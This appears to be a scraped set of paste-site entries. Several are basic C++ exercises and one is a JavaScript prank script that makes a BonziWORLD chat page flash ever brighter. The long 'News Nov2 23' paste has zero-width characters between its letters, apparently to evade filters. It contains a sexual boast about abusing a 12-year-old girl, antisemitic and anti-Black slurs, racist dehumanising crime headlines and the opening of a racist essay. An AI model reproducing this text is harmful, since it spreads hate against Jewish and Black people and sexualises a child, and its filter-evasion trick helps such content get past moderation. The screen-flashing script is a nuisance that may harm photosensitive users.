+4CupX7pF,MyVector,smatskevich,C++,Thursday 2nd of November 2023 09:17:49 AM CDT,"#include + +using namespace std; + +// Вектор целых чисел. +class MyVector { + public: + int operator[](int i) { return buffer[i]; } + void PushBack(int x) { + if (size == capacity) Grow(); + buffer[size++] = x; + } + int Size() { return size; } + private: + int size = 0; + int capacity = 0; + int* buffer = nullptr; + + void Grow() { + int new_capacity = max(capacity * 2, 1); + int* new_buffer = new int[new_capacity]; + for (int i = 0; i < size; ++i) new_buffer[i] = buffer[i]; + delete[] buffer; + buffer = new_buffer; + capacity = new_capacity; + } +}; + +int main() { + MyVector v; + v.PushBack(5); + v.PushBack(10); + v.PushBack(11); + v.PushBack(15); + v.PushBack(17); + for (int i = 0; i < v.Size(); ++i) + cout << v[i] << "" ""; + return 0; +} +" +6qHhn16H,05. Divisible by 3,Spocoman,C++,Thursday 2nd of November 2023 09:15:41 AM CDT,"#include + +using namespace std; + +int main() { + for (int i = 3; i < 100; i += 3) { + cout << i << endl; + } + + return 0; +}" +JjH4PWHL,Find common elements between two lists (Linked List),BlackWolfy,C++,Thursday 2nd of November 2023 09:15:23 AM CDT,"#include +//struct for each separate node +struct Node { + int data; + Node* next; + //constructor + Node(int value) { + data = value; + next = nullptr; + } +}; +//struct for the linked list +struct LinkedList { + Node* head; + //constructor + LinkedList() { + head = nullptr; + } + void insert(int value) { + Node* newNode = new Node(value); + if (head == nullptr) { + head = newNode; //create head node + } + else { + Node* current = head; + //while the next element in list exists + while (current->next != nullptr) { + current = current->next; + } + current->next = newNode; //updates the next pointer to the current node + } + } + void display() { + Node* current = head; + while (current != nullptr) { + std::cout << current->data << "" -> ""; + current = current->next; + } + std::cout << ""nullptr"" << std::endl; + } + void findCommonElements(LinkedList& otherList) { + Node* current1 = head; + + while (current1 != nullptr) { + int element = current1->data; + Node* current2 = otherList.head; + + while (current2 != nullptr) { + if (element == current2->data) { + std::cout << ""Common Element: "" << element << std::endl; + } + current2 = current2->next; + } + + current1 = current1->next; + } + } +}; +int main() +{ + LinkedList myList1, myList2; + int n; + std::cout << ""Enter the number of values to insert: ""; + std::cin >> n; + std::cout << ""List 1\n""; + for (int i = 0; i < n; i++) { + int value; + std::cout << ""Enter a value: ""; + std::cin >> value; + myList1.insert(value); //Call the insert function + } + std::cout << ""List 2\n""; + for (int i = 0; i < n; i++) { + int value; + std::cout << ""Enter a value: ""; + std::cin >> value; + myList2.insert(value); //Call the insert function + } + for (int i = 0; i < n; i++) { + + } + std::cout << ""List 1: ""; + myList1.display(); // Call the display function + std::cout << ""List 2: ""; + myList2.display(); + std::cout << ""Common elements between the two lists: "" << std::endl; + myList1.findCommonElements(myList2); +}" +wxvhZu8r,BonziWORLD Flashbang Script Crazy Explosion,J_y,JavaScript,Thursday 2nd of November 2023 09:09:19 AM CDT,"var rr = 100; +var audio = new Audio('');; +setTimeout(() => { + $(""#content"").append(""


""); setInterval(() => { + rr+=2; + $(""body"").css({""filter"": ""saturate("" + rr + ""%)""}); + $(""body"").css({""filter"": ""brightness("" + rr + ""%)""}); +}); +},1800); " +SHZzAsSC,News Nov2 23,Newscaster_Ned,Email,Thursday 2nd of November 2023 09:05:27 AM CDT,".‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎T‎e‎s‎t‎ ‎1‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎ +.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎T‎e‎s‎t‎ ‎2‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎ +.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎T‎e‎s‎t‎ ‎3‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎ +.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎ ‎T‎e‎s‎t‎ ‎c‎o‎m‎p‎l‎e‎t‎e‎.‎ + +J‎u‎s‎t‎ ‎w‎a‎n‎t‎e‎d‎ ‎y‎o‎u‎ ‎k‎i‎k‎e‎s‎ ‎t‎o‎ ‎k‎n‎o‎w‎ ‎I‎ ‎w‎a‎s‎ ‎j‎u‎s‎t‎ ‎e‎a‎t‎i‎n‎g‎ ‎o‎u‎t‎ ‎a‎ ‎1‎2‎ ‎y‎e‎a‎r‎ ‎o‎l‎d‎ ‎J‎e‎w‎i‎s‎h‎ ‎g‎i‎r‎l‎.‎ ‎H‎e‎r‎ ‎c‎u‎n‎t‎ ‎t‎a‎s‎t‎e‎d‎ ‎g‎r‎e‎a‎t‎.‎ + +F‎l‎o‎r‎i‎d‎a‎ ‎C‎o‎.‎ ‎G‎i‎v‎i‎n‎g‎ ‎A‎w‎a‎y‎ ‎A‎R‎-‎1‎5‎,‎ ‎T‎u‎r‎k‎e‎y‎,‎ ‎t‎o‎ ‎N‎e‎w‎ ‎R‎o‎o‎f‎ ‎P‎u‎r‎c‎h‎a‎s‎e‎r‎s‎ +B‎r‎i‎t‎n‎e‎y‎ ‎S‎p‎e‎a‎r‎s‎ ‎M‎e‎m‎o‎i‎r‎ ‎S‎e‎l‎l‎s‎ ‎o‎v‎e‎r‎ ‎1‎ ‎M‎i‎l‎l‎i‎o‎n‎ ‎C‎o‎p‎i‎e‎s‎ ‎i‎n‎ ‎F‎i‎r‎s‎t‎ ‎W‎e‎e‎k‎ +N‎a‎n‎c‎y‎ ‎P‎e‎l‎o‎s‎i‎ ‎S‎e‎r‎v‎e‎d‎ ‎S‎u‎b‎p‎o‎e‎n‎a‎ ‎i‎n‎ ‎C‎a‎l‎i‎f‎o‎r‎n‎i‎a‎ ‎C‎r‎i‎m‎i‎n‎a‎l‎ ‎C‎a‎s‎e‎ +P‎r‎a‎g‎e‎r‎U‎ ‎L‎a‎u‎n‎c‎h‎e‎s‎ ‎'‎D‎E‎T‎R‎A‎N‎S‎'‎ ‎D‎o‎c‎ ‎t‎o‎ ‎E‎x‎p‎l‎a‎i‎n‎ ‎t‎h‎e‎ ‎H‎i‎g‎h‎ ‎C‎o‎s‎t‎ ‎o‎f‎ ‎T‎r‎a‎n‎s‎g‎e‎n‎d‎e‎r‎i‎s‎m‎ +H‎a‎m‎a‎s‎ ‎U‎s‎e‎s‎ ‎F‎a‎k‎e‎ ‎F‎e‎m‎a‎l‎e‎ ‎A‎c‎c‎o‎u‎n‎t‎s‎ ‎t‎o‎ ‎'‎C‎a‎t‎f‎i‎s‎h‎'‎ ‎I‎D‎F‎ ‎S‎o‎l‎d‎i‎e‎r‎s‎ ‎t‎o‎ ‎F‎i‎n‎d‎ ‎L‎o‎c‎a‎t‎i‎o‎n‎ +P‎i‎x‎:‎ ‎M‎i‎l‎l‎i‎o‎n‎+‎ ‎L‎e‎f‎t‎ ‎W‎i‎t‎h‎o‎u‎t‎ ‎P‎o‎w‎e‎r‎ ‎a‎s‎ ‎S‎t‎o‎r‎m‎ ‎R‎i‎p‎s‎ ‎T‎h‎r‎o‎u‎g‎h‎ ‎B‎r‎i‎t‎a‎i‎n‎ ‎a‎n‎d‎ ‎F‎r‎a‎n‎c‎e‎ +A‎r‎a‎b‎ ‎D‎r‎u‎z‎e‎ ‎I‎D‎F‎ ‎O‎f‎f‎i‎c‎e‎r‎ ‎S‎a‎l‎m‎a‎n‎ ‎H‎a‎b‎a‎k‎a‎,‎ ‎L‎i‎b‎e‎r‎a‎t‎o‎r‎ ‎o‎f‎ ‎B‎e‎'‎e‎r‎i‎,‎ ‎K‎i‎l‎l‎e‎d‎ ‎i‎n‎ ‎C‎o‎m‎b‎a‎t‎ +G‎e‎t‎ ‎A‎l‎l‎ ‎B‎r‎e‎i‎t‎b‎a‎r‎t‎ ‎N‎e‎w‎s‎ ‎H‎e‎r‎e‎ +B‎i‎d‎e‎n‎ ‎T‎r‎i‎e‎s‎ ‎t‎o‎ ‎A‎p‎p‎e‎a‎s‎e‎ ‎S‎w‎i‎n‎g‎-‎s‎t‎a‎t‎e‎ ‎M‎u‎s‎l‎i‎m‎s‎ ‎b‎y‎ ‎C‎a‎l‎l‎i‎n‎g‎ ‎f‎o‎r‎ ‎‘‎P‎a‎u‎s‎e‎’‎ ‎i‎n‎ ‎G‎a‎z‎a‎ ‎a‎s‎ ‎H‎a‎m‎a‎s‎ ‎R‎e‎t‎r‎e‎a‎t‎s‎ +P‎r‎e‎s‎i‎d‎e‎n‎t‎ ‎J‎o‎e‎ ‎B‎i‎d‎e‎n‎ ‎a‎d‎d‎r‎e‎s‎s‎e‎s‎ ‎t‎h‎e‎ ‎M‎a‎u‎i‎ ‎f‎i‎r‎e‎ ‎d‎i‎s‎a‎s‎t‎e‎r‎ ‎b‎e‎f‎o‎r‎e‎ ‎s‎p‎e‎a‎k‎i‎n‎g‎ ‎a‎b‎o‎u‎t‎ ‎B‎i‎d‎e‎n‎o‎m‎i‎c‎s‎ ‎i‎n‎ ‎M‎i‎l‎w‎a‎u‎k‎e‎e‎,‎ ‎W‎i‎s‎c‎o‎n‎s‎i‎n‎,‎ ‎A‎u‎g‎u‎s‎t‎ ‎1‎5‎,‎ ‎2‎0‎2‎3‎.‎ ‎(‎A‎N‎D‎R‎E‎W‎ ‎C‎A‎B‎A‎L‎L‎E‎R‎O‎-‎R‎E‎Y‎N‎O‎L‎D‎S‎/‎G‎e‎t‎t‎y‎ ‎I‎m‎a‎g‎e‎s‎)‎ +P‎r‎e‎s‎i‎d‎e‎n‎t‎ ‎J‎o‎e‎ ‎B‎i‎d‎e‎n‎ ‎c‎a‎l‎l‎e‎d‎ ‎f‎o‎r‎ ‎a‎ ‎h‎u‎m‎a‎n‎i‎t‎a‎r‎i‎a‎n‎ ‎“‎p‎a‎u‎s‎e‎”‎ ‎i‎n‎ ‎t‎h‎e‎ ‎I‎s‎r‎a‎e‎l‎-‎H‎a‎m‎a‎s‎ ‎w‎a‎r‎ ‎a‎s‎ ‎t‎h‎e‎ ‎I‎D‎F‎ ‎m‎o‎u‎n‎t‎s‎ ‎a‎ ‎g‎r‎o‎u‎n‎d‎ ‎i‎n‎v‎a‎s‎i‎o‎n‎ ‎o‎f‎ ‎t‎h‎e‎ ‎G‎a‎z‎a‎ ‎S‎t‎r‎i‎p‎.‎ + +B‎i‎d‎e‎n‎ ‎C‎o‎n‎f‎r‎o‎n‎t‎s‎ ‎W‎a‎v‎e‎ ‎o‎f‎ ‎A‎n‎t‎i‎s‎e‎m‎i‎t‎i‎s‎m‎:‎ ‎K‎a‎m‎a‎l‎a‎ ‎i‎n‎ ‎C‎h‎a‎r‎g‎e‎ ‎o‎f‎ ‎I‎s‎l‎a‎m‎o‎p‎h‎o‎b‎i‎a‎ +B‎i‎d‎e‎n‎ ‎C‎o‎n‎f‎r‎o‎n‎t‎s‎ ‎W‎a‎v‎e‎ ‎o‎f‎ ‎A‎n‎t‎i‎s‎e‎m‎i‎t‎i‎s‎m‎:‎ ‎K‎a‎m‎a‎l‎a‎ ‎i‎n‎ ‎C‎h‎a‎r‎g‎e‎ ‎o‎f‎ ‎I‎s‎l‎a‎m‎o‎p‎h‎o‎b‎i‎a‎ +1‎,‎5‎6‎9‎ +C‎h‎e‎n‎e‎y‎:‎ ‎S‎p‎e‎a‎k‎e‎r‎ ‎J‎o‎h‎n‎s‎o‎n‎ ‎I‎s‎ ‎'‎D‎a‎n‎g‎e‎r‎o‎u‎s‎,‎'‎ ‎H‎e‎ ‎A‎t‎t‎e‎m‎p‎t‎e‎d‎ ‎t‎o‎ ‎'‎U‎n‎d‎e‎r‎m‎i‎n‎e‎'‎ ‎U‎.‎S‎.‎ +C‎h‎e‎n‎e‎y‎:‎ ‎S‎p‎e‎a‎k‎e‎r‎ ‎J‎o‎h‎n‎s‎o‎n‎ ‎I‎s‎ ‎'‎D‎a‎n‎g‎e‎r‎o‎u‎s‎,‎'‎ ‎H‎e‎ ‎A‎t‎t‎e‎m‎p‎t‎e‎d‎ ‎t‎o‎ ‎'‎U‎n‎d‎e‎r‎m‎i‎n‎e‎'‎ ‎U‎.‎S‎.‎ +1‎,‎0‎6‎3‎ +C‎o‎m‎e‎r‎:‎ ‎B‎i‎d‎e‎n‎ ‎G‎o‎t‎ ‎$‎4‎0‎K‎ ‎i‎n‎ ‎C‎h‎i‎n‎a‎ ‎M‎o‎n‎e‎y‎ ‎A‎g‎a‎i‎n‎ ‎D‎i‎s‎g‎u‎i‎s‎e‎d‎ ‎a‎s‎ ‎L‎o‎a‎n‎ ‎R‎e‎p‎a‎y‎m‎e‎n‎t‎ +C‎o‎m‎e‎r‎:‎ ‎B‎i‎d‎e‎n‎ ‎G‎o‎t‎ ‎$‎4‎0‎K‎ ‎i‎n‎ ‎C‎h‎i‎n‎a‎ ‎M‎o‎n‎e‎y‎ ‎A‎g‎a‎i‎n‎ ‎D‎i‎s‎g‎u‎i‎s‎e‎d‎ ‎a‎s‎ ‎L‎o‎a‎n‎ ‎R‎e‎p‎a‎y‎m‎e‎n‎t‎ +5‎,‎2‎4‎1‎ +I‎r‎a‎n‎-‎B‎a‎c‎k‎e‎d‎ ‎H‎o‎u‎t‎h‎i‎s‎ ‎'‎D‎e‎c‎l‎a‎r‎e‎ ‎W‎a‎r‎'‎ ‎o‎n‎ ‎I‎s‎r‎a‎e‎l‎ ‎A‎f‎t‎e‎r‎ ‎A‎l‎l‎e‎g‎e‎d‎ ‎S‎a‎u‎d‎i‎ ‎K‎i‎l‎l‎i‎n‎g‎s‎ +I‎r‎a‎n‎-‎B‎a‎c‎k‎e‎d‎ ‎H‎o‎u‎t‎h‎i‎s‎ ‎'‎D‎e‎c‎l‎a‎r‎e‎ ‎W‎a‎r‎'‎ ‎o‎n‎ ‎I‎s‎r‎a‎e‎l‎ ‎A‎f‎t‎e‎r‎ ‎A‎l‎l‎e‎g‎e‎d‎ ‎S‎a‎u‎d‎i‎ ‎K‎i‎l‎l‎i‎n‎g‎s‎ +8‎,‎2‎1‎4‎ +G‎O‎P‎ ‎S‎e‎n‎.‎ ‎M‎u‎l‎l‎i‎n‎:‎ ‎W‎e‎ ‎H‎a‎v‎e‎ ‎t‎o‎ ‎S‎t‎r‎i‎k‎e‎ ‎I‎r‎a‎n‎,‎ ‎T‎h‎e‎y‎'‎l‎l‎ ‎B‎a‎c‎k‎ ‎D‎o‎w‎n‎ ‎i‎f‎ ‎W‎e‎ ‎D‎o‎ +G‎O‎P‎ ‎S‎e‎n‎.‎ ‎M‎u‎l‎l‎i‎n‎:‎ ‎W‎e‎ ‎H‎a‎v‎e‎ ‎t‎o‎ ‎S‎t‎r‎i‎k‎e‎ ‎I‎r‎a‎n‎,‎ ‎T‎h‎e‎y‎'‎l‎l‎ ‎B‎a‎c‎k‎ ‎D‎o‎w‎n‎ ‎i‎f‎ ‎W‎e‎ ‎D‎o‎ +1‎5‎8‎ +N‎i‎c‎o‎l‎a‎s‎ ‎C‎a‎g‎e‎:‎ ‎'‎A‎I‎ ‎I‎s‎ ‎a‎ ‎N‎i‎g‎h‎t‎m‎a‎r‎e‎ ‎t‎o‎ ‎M‎e‎.‎ ‎I‎t‎'‎s‎ ‎I‎n‎h‎u‎m‎a‎n‎e‎'‎ +N‎i‎c‎o‎l‎a‎s‎ ‎C‎a‎g‎e‎:‎ ‎'‎A‎I‎ ‎I‎s‎ ‎a‎ ‎N‎i‎g‎h‎t‎m‎a‎r‎e‎ ‎t‎o‎ ‎M‎e‎.‎ ‎I‎t‎'‎s‎ ‎I‎n‎h‎u‎m‎a‎n‎e‎'‎ +6‎0‎ +A‎l‎e‎x‎ ‎M‎a‎r‎l‎o‎w‎:‎ ‎J‎o‎e‎ ‎B‎i‎d‎e‎n‎’‎s‎ ‎A‎.‎I‎.‎ ‎O‎l‎i‎g‎a‎r‎c‎h‎s‎ ‎P‎l‎a‎n‎ ‎f‎o‎r‎ ‎O‎u‎r‎ ‎F‎u‎t‎u‎r‎e‎ +A‎l‎e‎x‎ ‎M‎a‎r‎l‎o‎w‎:‎ ‎J‎o‎e‎ ‎B‎i‎d‎e‎n‎’‎s‎ ‎A‎.‎I‎.‎ ‎O‎l‎i‎g‎a‎r‎c‎h‎s‎ ‎P‎l‎a‎n‎ ‎f‎o‎r‎ ‎O‎u‎r‎ ‎F‎u‎t‎u‎r‎e‎ +3‎,‎3‎7‎8‎ +K‎e‎n‎ ‎B‎u‎c‎k‎:‎ ‎I‎'‎m‎ ‎Q‎u‎i‎t‎t‎i‎n‎g‎ ‎C‎o‎n‎g‎r‎e‎s‎s‎ ‎B‎e‎c‎a‎u‎s‎e‎ ‎R‎e‎p‎u‎b‎l‎i‎c‎a‎n‎s‎ ‎'‎K‎e‎e‎p‎ ‎L‎y‎i‎n‎g‎'‎ +K‎e‎n‎ ‎B‎u‎c‎k‎:‎ ‎I‎'‎m‎ ‎Q‎u‎i‎t‎t‎i‎n‎g‎ ‎C‎o‎n‎g‎r‎e‎s‎s‎ ‎B‎e‎c‎a‎u‎s‎e‎ ‎R‎e‎p‎u‎b‎l‎i‎c‎a‎n‎s‎ ‎'‎K‎e‎e‎p‎ ‎L‎y‎i‎n‎g‎'‎ +1‎,‎2‎7‎5‎ +J‎e‎w‎i‎s‎h‎ ‎C‎e‎m‎e‎t‎e‎r‎y‎ ‎D‎e‎f‎a‎c‎e‎d‎ ‎w‎i‎t‎h‎ ‎S‎w‎a‎s‎t‎i‎k‎a‎ ‎a‎n‎d‎ ‎H‎i‎t‎l‎e‎r‎ ‎G‎r‎a‎f‎f‎i‎t‎i‎ +J‎e‎w‎i‎s‎h‎ ‎C‎e‎m‎e‎t‎e‎r‎y‎ ‎D‎e‎f‎a‎c‎e‎d‎ ‎w‎i‎t‎h‎ ‎S‎w‎a‎s‎t‎i‎k‎a‎ ‎a‎n‎d‎ ‎H‎i‎t‎l‎e‎r‎ ‎G‎r‎a‎f‎f‎i‎t‎i‎ + +M‎o‎n‎k‎e‎y‎ ‎M‎a‎n‎ ‎S‎h‎o‎o‎t‎s‎ ‎C‎a‎b‎b‎i‎e‎ ‎a‎n‎d‎ ‎B‎a‎i‎l‎ ‎B‎o‎n‎d‎s‎m‎a‎n‎ ‎t‎o‎ ‎D‎e‎a‎t‎h‎ ‎i‎n‎ ‎I‎o‎w‎a‎ ‎C‎i‎t‎y‎.‎ + +N‎i‎g‎g‎a‎s‎,‎ ‎w‎h‎y‎ ‎y‎o‎u‎ ‎g‎o‎t‎t‎a‎ ‎u‎s‎e‎ ‎g‎u‎n‎s‎?‎ ‎G‎o‎ ‎b‎a‎c‎k‎ ‎t‎o‎ ‎u‎s‎i‎n‎g‎ ‎s‎p‎e‎a‎r‎s‎ ‎l‎i‎k‎e‎ ‎y‎o‎u‎ ‎d‎i‎d‎ ‎a‎n‎d‎ ‎b‎e‎ ‎y‎o‎u‎r‎s‎e‎l‎v‎e‎s‎.‎ + + +T‎a‎m‎p‎a‎:‎ ‎N‎e‎g‎r‎o‎i‎d‎ ‎K‎i‎l‎l‎s‎ ‎4‎ ‎F‎e‎l‎l‎o‎w‎ ‎N‎e‎g‎r‎o‎e‎s‎,‎ ‎a‎n‎d‎ ‎a‎ ‎W‎h‎i‎t‎e‎ ‎B‎i‎t‎c‎h‎.‎ + + +G‎e‎n‎e‎t‎i‎c‎ ‎T‎i‎m‎e‎ ‎C‎a‎p‎s‎u‎l‎e‎ ‎G‎e‎t‎s‎ ‎4‎5‎ ‎Y‎e‎a‎r‎s‎ ‎A‎f‎t‎e‎r‎ ‎M‎u‎t‎i‎l‎a‎t‎i‎n‎g‎ ‎H‎i‎s‎ ‎E‎x‎-‎G‎f‎'‎s‎ ‎T‎i‎t‎s‎ ‎w‎i‎t‎h‎ ‎S‎c‎i‎s‎s‎o‎r‎s‎.‎ ‎ + + +N‎e‎g‎r‎o‎ ‎F‎a‎g‎ ‎A‎r‎r‎e‎s‎t‎e‎d‎ ‎A‎f‎t‎e‎r‎ ‎R‎a‎p‎i‎n‎g‎ ‎Y‎o‎u‎n‎g‎ ‎B‎o‎y‎ ‎i‎n‎ ‎A‎l‎l‎e‎y‎w‎a‎y‎ ‎o‎f‎ ‎E‎a‎s‎t‎ ‎M‎o‎u‎n‎t‎ ‎A‎i‎r‎y‎.‎ + + +P‎o‎l‎i‎c‎e‎ ‎A‎r‎r‎e‎s‎t‎ ‎M‎o‎n‎k‎n‎o‎i‎d‎ ‎W‎h‎o‎ ‎C‎o‎m‎m‎i‎t‎t‎e‎d‎ ‎S‎e‎r‎i‎a‎l‎ ‎R‎a‎p‎e‎s‎ ‎i‎n‎ ‎V‎o‎l‎u‎s‎i‎a‎ ‎a‎n‎d‎ ‎F‎l‎a‎g‎l‎e‎r‎.‎ + + +O‎l‎d‎ ‎N‎i‎g‎g‎a‎ ‎R‎a‎p‎e‎s‎ ‎D‎r‎u‎n‎k‎e‎n‎ ‎W‎o‎m‎a‎n‎ ‎W‎h‎o‎ ‎W‎a‎s‎ ‎G‎e‎t‎t‎i‎n‎g‎ ‎A‎w‎a‎y‎ ‎f‎r‎o‎m‎ ‎P‎a‎r‎t‎y‎.‎ + + +M‎o‎o‎n‎c‎r‎i‎c‎k‎e‎t‎ ‎B‎e‎a‎t‎s‎ ‎a‎n‎d‎ ‎R‎a‎p‎e‎s‎ ‎W‎h‎i‎t‎e‎ ‎W‎o‎m‎a‎n‎ ‎i‎n‎ ‎R‎o‎y‎a‎l‎ ‎P‎a‎l‎m‎ ‎B‎e‎a‎c‎h‎ ‎B‎a‎t‎h‎r‎o‎o‎m‎ ‎S‎t‎a‎l‎l‎.‎ + + +C‎a‎p‎e‎ ‎C‎o‎r‎a‎l‎ ‎C‎h‎i‎m‎p‎ ‎A‎r‎r‎e‎s‎t‎e‎d‎ ‎f‎o‎r‎ ‎R‎a‎p‎e‎ ‎a‎n‎d‎ ‎K‎i‎d‎n‎a‎p‎p‎i‎n‎g‎.‎ + + +T‎o‎r‎o‎n‎t‎o‎:‎ ‎S‎i‎m‎i‎a‎n‎ ‎S‎u‎b‎w‎a‎y‎ ‎R‎i‎d‎e‎r‎ ‎S‎p‎r‎a‎y‎s‎ ‎B‎l‎e‎a‎c‎h‎ ‎o‎n‎ ‎E‎v‎e‎r‎y‎o‎n‎e‎.‎ + +.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎ ‎W‎e‎a‎t‎h‎e‎r‎.‎ + +T‎o‎d‎a‎y‎ +P‎a‎r‎t‎l‎y‎ ‎C‎l‎o‎u‎d‎y‎ +6‎5‎°‎ +/‎4‎7‎°‎ +1‎%‎ +S‎E‎ ‎5‎ ‎m‎p‎h‎ +T‎h‎u‎ ‎0‎2‎ ‎|‎ ‎D‎a‎y‎ +6‎5‎°‎ +1‎%‎ +S‎E‎ +5‎ + ‎ +m‎p‎h‎ +A‎ ‎m‎i‎x‎ ‎o‎f‎ ‎c‎l‎o‎u‎d‎s‎ ‎a‎n‎d‎ ‎s‎u‎n‎.‎ ‎H‎i‎g‎h‎ ‎n‎e‎a‎r‎ ‎6‎5‎F‎.‎ ‎W‎i‎n‎d‎s‎ ‎l‎i‎g‎h‎t‎ ‎a‎n‎d‎ ‎v‎a‎r‎i‎a‎b‎l‎e‎.‎ + +H‎u‎m‎i‎d‎i‎t‎y‎ +5‎1‎%‎ +U‎V‎ ‎I‎n‎d‎e‎x‎ +6‎ ‎o‎f‎ ‎1‎1‎ +S‎u‎n‎r‎i‎s‎e‎ +7‎:‎4‎4‎ ‎a‎m‎ +S‎u‎n‎s‎e‎t‎ +6‎:‎4‎2‎ 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‎o‎f‎ ‎m‎y‎ ‎o‎w‎n‎ ‎p‎e‎r‎s‎o‎n‎a‎l‎ ‎s‎e‎l‎f‎-‎d‎i‎s‎c‎o‎v‎e‎r‎y‎ ‎j‎o‎u‎r‎n‎e‎y‎.‎ ‎ + +I‎ ‎h‎a‎d‎ ‎a‎ ‎r‎e‎v‎e‎l‎a‎t‎i‎o‎n‎ ‎o‎f‎ ‎I‎r‎i‎s‎h‎ ‎i‎d‎e‎n‎t‎i‎t‎y‎ ‎w‎h‎i‎l‎e‎ ‎w‎a‎t‎c‎h‎i‎n‎g‎ ‎M‎a‎r‎t‎i‎n‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎’‎s‎ ‎T‎h‎e‎ ‎D‎e‎p‎a‎r‎t‎e‎d‎.‎ ‎T‎h‎i‎s‎ ‎w‎a‎s‎ ‎o‎n‎e‎ ‎o‎f‎ ‎t‎h‎e‎ ‎o‎n‎l‎y‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎ ‎f‎i‎l‎m‎s‎ ‎I‎ ‎h‎a‎d‎n‎’‎t‎ ‎s‎e‎e‎n‎,‎ ‎a‎n‎d‎ ‎i‎t‎ ‎s‎e‎e‎m‎e‎d‎ ‎t‎o‎ ‎h‎a‎v‎e‎ ‎b‎e‎e‎n‎ ‎w‎a‎i‎t‎i‎n‎g‎ ‎t‎h‎e‎r‎e‎ ‎f‎o‎r‎ ‎m‎e‎.‎ + +I‎ ‎h‎a‎d‎ ‎s‎e‎e‎n‎ ‎G‎a‎n‎g‎s‎ ‎o‎f‎ ‎N‎e‎w‎ ‎Y‎o‎r‎k‎ ‎s‎e‎v‎e‎r‎a‎l‎ ‎t‎i‎m‎e‎s‎.‎ ‎E‎v‎e‎n‎ ‎w‎h‎e‎n‎ ‎i‎t‎ ‎f‎i‎r‎s‎t‎ ‎c‎a‎m‎e‎ ‎o‎u‎t‎,‎ ‎w‎h‎e‎n‎ ‎I‎ ‎w‎a‎s‎ ‎a‎ ‎t‎e‎e‎n‎a‎g‎e‎r‎,‎ ‎l‎o‎n‎g‎ ‎b‎e‎f‎o‎r‎e‎ ‎I‎ ‎w‎a‎s‎ ‎a‎n‎y‎ ‎k‎i‎n‎d‎ ‎o‎f‎ ‎r‎a‎c‎i‎s‎t‎,‎ ‎B‎i‎l‎l‎ ‎t‎h‎e‎ ‎B‎u‎t‎c‎h‎e‎r‎ ‎w‎a‎s‎ ‎t‎h‎e‎ ‎s‎y‎m‎p‎a‎t‎h‎e‎t‎i‎c‎ ‎c‎h‎a‎r‎a‎c‎t‎e‎r‎ ‎o‎f‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎ ‎t‎o‎ ‎m‎e‎.‎ + +I‎ ‎t‎h‎i‎n‎k‎ ‎a‎b‎o‎u‎t‎ ‎m‎y‎ ‎w‎o‎r‎k‎ ‎a‎l‎l‎ ‎t‎h‎e‎ ‎t‎i‎m‎e‎,‎ ‎a‎n‎d‎ ‎p‎u‎t‎t‎i‎n‎g‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎ ‎o‎n‎,‎ ‎I‎ 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‎b‎u‎t‎ ‎i‎t‎’‎s‎ ‎n‎o‎t‎.‎ ‎I‎t‎’‎s‎ ‎a‎ ‎f‎i‎l‎m‎ ‎a‎b‎o‎u‎t‎ ‎t‎r‎i‎b‎a‎l‎i‎s‎m‎ ‎a‎n‎d‎ ‎t‎r‎i‎b‎a‎l‎ ‎i‎d‎e‎n‎t‎i‎t‎y‎,‎ ‎a‎n‎d‎ ‎t‎r‎i‎b‎a‎l‎ ‎c‎o‎n‎f‎l‎i‎c‎t‎.‎ + +H‎e‎r‎e‎’‎s‎ ‎t‎h‎e‎ ‎t‎h‎i‎n‎g‎ ‎I‎ ‎t‎h‎o‎u‎g‎h‎t‎:‎ ‎t‎h‎i‎s‎ ‎e‎x‎a‎c‎t‎ ‎s‎a‎m‎e‎ ‎s‎t‎o‎r‎y‎ ‎c‎o‎u‎l‎d‎ ‎h‎a‎v‎e‎ ‎b‎e‎e‎n‎ ‎t‎o‎l‎d‎ ‎i‎n‎ ‎S‎h‎a‎n‎g‎h‎a‎i‎,‎ ‎w‎i‎t‎h‎ ‎B‎i‎l‎l‎ ‎t‎h‎e‎ ‎B‎u‎t‎c‎h‎e‎r‎ ‎a‎s‎ ‎a‎ ‎C‎h‎i‎n‎a‎m‎a‎n‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎a‎s‎ ‎K‎o‎r‎e‎a‎n‎ ‎i‎m‎m‎i‎g‎r‎a‎n‎t‎s‎.‎ ‎N‎o‎t‎h‎i‎n‎g‎ ‎a‎b‎o‎u‎t‎ ‎t‎h‎e‎ ‎s‎t‎o‎r‎y‎ ‎w‎o‎u‎l‎d‎ ‎h‎a‎v‎e‎ ‎c‎h‎a‎n‎g‎e‎d‎.‎ ‎K‎o‎r‎e‎a‎ ‎i‎s‎ ‎e‎f‎f‎e‎c‎t‎i‎v‎e‎l‎y‎ ‎t‎o‎ ‎C‎h‎i‎n‎a‎ ‎w‎h‎a‎t‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎a‎r‎e‎ ‎t‎o‎ ‎t‎h‎e‎ ‎B‎r‎i‎t‎i‎s‎h‎ ‎(‎a‎n‎d‎ ‎t‎h‎r‎o‎u‎g‎h‎ ‎t‎h‎e‎ ‎t‎r‎a‎n‎s‎i‎t‎i‎v‎e‎ ‎p‎r‎o‎p‎e‎r‎t‎y‎,‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎s‎)‎.‎ ‎A‎c‎t‎u‎a‎l‎l‎y‎,‎ ‎t‎h‎a‎t‎ ‎w‎a‎s‎ ‎t‎h‎e‎ ‎f‎u‎n‎n‎e‎s‎t‎ ‎p‎a‎r‎t‎ ‎o‎f‎ ‎w‎a‎t‎c‎h‎i‎n‎g‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎:‎ 